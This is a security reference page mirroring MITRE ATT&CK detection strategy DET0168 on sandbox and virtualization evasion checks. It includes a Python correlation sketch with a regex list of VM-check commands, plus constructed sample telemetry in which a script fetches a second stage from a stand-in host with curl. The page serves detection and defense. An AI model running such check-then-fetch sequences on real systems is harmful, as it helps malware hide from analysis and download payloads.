DET0168: Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS
Analyst context for executives and security teams
This detection strategy matters because virtualization and sandbox checks are a common way for suspicious software to decide whether it is being analyzed. If these checks go unnoticed, malware analysis, SOC triage, and incident response may see a harmless-looking execution path while the real behavior is withheld until the software believes it is on a real Windows, Linux, or macOS host.
Executive priority
Treat this as a validation point for detection engineering and incident response readiness, not just a malware-analysis detail. Leaders should ask whether endpoint and analysis pipelines can identify environment-awareness behaviors that may hide later payloads or core implant functions. The business value is reducing false reassurance during investigations and improving confidence that sandbox, EDR, and SOC evidence reflects what would happen on production systems.
Technical view
MITRE links this detection strategy to T1497.001 System Checks, a sub-technique of Virtualization/Sandbox Evasion that sits under the Defense Evasion and Discovery tactics. SOC and IR teams should validate whether telemetry can show processes querying host, hardware, virtualization, sandbox, or environment artifacts before they change behavior, exit, delay, or withhold additional payloads. Because the technique covers Linux, macOS, and Windows, coverage should be checked per operating system rather than assumed globally.
Likely telemetry
- Endpoint process execution and command-line metadata
- System, hardware, and environment discovery events where available
- File, registry, configuration, or system artifact access associated with environment checks
- Parent-child process relationships around suspicious binaries or scripts
- Sandbox or malware-analysis execution traces showing conditional behavior, early exit, or payload suppression
Detection direction
- Validate detections against behavior patterns, not only known tool names, because the technique is defined by what the software does (reading environment artifacts and acting on the result), not by which utility it uses to do so.
- Look for suspicious clustering of discovery activity followed by behavior changes such as disengagement, concealment, or delayed secondary payload activity, as described in the related technique.
- Tune carefully for legitimate software that inventories hardware, OS, or runtime environment to reduce false positives.
- Compare sandbox observations with production-like endpoint telemetry when safe and appropriate, since sandbox-aware behavior can create analysis blind spots.
- Measure coverage separately for Windows, Linux, and macOS based on actual collected telemetry.
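The telemetry and detection-direction items above describe a correlation rather than a single signature: several different environment checks from one parent process inside a short window, followed by either continued activity or silence. The sketch below, added here as an illustration and not part of the Glexia page or MITRE's DET0168 object, runs that correlation over a handful of constructed process events and reports findings per operating system. The event schema, the indicator patterns, the 120-second window and the two-category threshold are all assumptions chosen for the example.

```python
"""Toy correlation for T1497.001-style system checks over endpoint process events.
Everything here (schema, indicator catalogue, thresholds, sample data) is an
assumption made for illustration, not Glexia or MITRE detection content."""
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class Event:
    host: str
    os: str        # "windows", "linux" or "macos"
    ts: int        # seconds (constructed timestamps)
    pid: int
    ppid: int
    image: str
    cmdline: str


# Hypothetical catalogue of command lines that read virtualization/sandbox
# artifacts, grouped into coarse categories so a finding requires several
# *different kinds* of check rather than the same command repeated.
INDICATORS = [
    ("windows", "hardware", r"\bwmic\b.*\b(computersystem|baseboard|bios|diskdrive)\b"),
    ("windows", "hardware", r"\bsysteminfo\b"),
    ("windows", "registry", r"\breg(?:\.exe)?\s+query\b.*(SystemBiosVersion|VideoBiosVersion|\\Disk\\Enum|VMware|VBox)"),
    ("windows", "process",  r"\btasklist\b"),
    ("linux",   "hardware", r"\bdmidecode\b|/sys/class/dmi/id/"),
    ("linux",   "cpu",      r"/proc/cpuinfo|\blscpu\b"),
    ("linux",   "virt",     r"\bsystemd-detect-virt\b|\bvirt-what\b"),
    ("macos",   "hardware", r"\bsystem_profiler\b.*SPHardwareDataType|\bsysctl\b.*\bhw\.model\b"),
    ("macos",   "virt",     r"\bioreg\b.*IOPlatformExpertDevice"),
]
COMPILED = [(os_, cat, re.compile(rx, re.I)) for os_, cat, rx in INDICATORS]


def check_categories(ev: Event) -> set[str]:
    """Indicator categories this event matches, restricted to its own OS."""
    return {cat for os_, cat, rx in COMPILED if os_ == ev.os and rx.search(ev.cmdline)}


def detect(events, window=120, min_categories=2):
    """Group check-like children under their parent process; raise a finding when
    at least `min_categories` distinct categories occur within `window` seconds.
    Also record what the parent ran after its last check, since the interesting
    pattern is discovery followed by a change in behaviour (or by nothing at all)."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[(ev.host, ev.ppid)].append(ev)

    findings = []
    for (host, ppid), children in by_parent.items():
        children.sort(key=lambda e: e.ts)
        checks = [(e, c) for e in children if (c := check_categories(e))]
        if not checks:
            continue
        hit = None
        for i, (start, _) in enumerate(checks):          # sliding window over checks
            cats = set()
            for e, c in checks[i:]:
                if e.ts - start.ts > window:
                    break
                cats |= c
            if len(cats) >= min_categories:
                hit = cats
                break
        if hit is None:
            continue                                      # single or widely spaced checks: likely inventory noise
        last_check_ts = max(e.ts for e, _ in checks)
        after = [e.cmdline for e in children if e.ts > last_check_ts and not check_categories(e)]
        findings.append({
            "host": host, "os": children[0].os, "ppid": ppid,
            "categories": sorted(hit),
            "post_check_children": after,
            "behaviour": "continued" if after else "no further child activity",
        })
    return findings


def findings_by_os(findings):
    """Per-OS count, so coverage is reported separately for each platform."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["os"]] += 1
    return dict(counts)


# Constructed sample telemetry, not real data.
SAMPLE_EVENTS = [
    # Windows: unknown parent queries hardware, then a BIOS registry key, then goes quiet.
    Event("w1", "windows", 1000, 501, 400, "wmic.exe", "wmic computersystem get model,manufacturer"),
    Event("w1", "windows", 1003, 502, 400, "reg.exe", r"reg query HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion"),
    # Linux: script reads DMI product name, asks systemd, then fetches a second stage.
    Event("l1", "linux", 2000, 3101, 2200, "cat", "cat /sys/class/dmi/id/product_name"),
    Event("l1", "linux", 2002, 3102, 2200, "systemd-detect-virt", "systemd-detect-virt"),
    Event("l1", "linux", 2010, 3103, 2200, "curl", "curl -s http://example.invalid/stage2 -o /tmp/s2"),
    # macOS: inventory agent running one hardware query -> below threshold (false-positive control).
    Event("m1", "macos", 3000, 911, 900, "system_profiler", "system_profiler SPHardwareDataType"),
    # Windows: two checks by one parent an hour apart -> outside the default window.
    Event("w2", "windows", 4000, 601, 500, "systeminfo.exe", "systeminfo"),
    Event("w2", "windows", 7600, 602, 500, "tasklist.exe", "tasklist /v"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
    print(findings_by_os(detect(SAMPLE_EVENTS)))
```

The w1 finding is the case the page warns about: two different checks and then silence, which in a sandbox trace would look like a benign early exit. The m1 and w2 events show why the threshold and window matter for tuning against legitimate inventory software; widening the window to an hour turns w2 into a finding, so the values should be set from your own baseline rather than copied from here.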
Mitigation priorities
- Prioritize telemetry completeness for endpoint and analysis environments before relying on alerts from this strategy.
- Harden malware-analysis and sandbox workflows so analysts know when a sample may have detected the environment and withheld behavior.
- Document coverage and gaps as compliance or audit evidence for detection and incident response readiness.
- Use incident response playbooks that preserve host context and execution traces, because local environment evidence may determine whether evasion occurred.
- Feed confirmed observations into detection engineering and threat intelligence processes without assuming attribution or active exploitation from this object alone.
Analyst notes and limits
The supplied ATT&CK object is a detection strategy, DET0168, with no official description or official detection text provided. Its decision value comes primarily from the relationship stating that it detects T1497.001 System Checks, a defense-evasion and discovery sub-technique covering virtualization or sandbox evasion across Windows, Linux, and macOS.
Platforms and tactics are not specified on the detection-strategy object itself; platform and tactic context comes from the related T1497.001 technique. No official detection logic, data sources, mitigations, adversary use, or active exploitation claims were supplied, so local telemetry review is required.
No official description is available in the imported ATT&CK source object.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1497.001 | System Checks (sub-technique of T1497) | This object detects System Checks. |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 698920ff6a71… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: DET0168 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.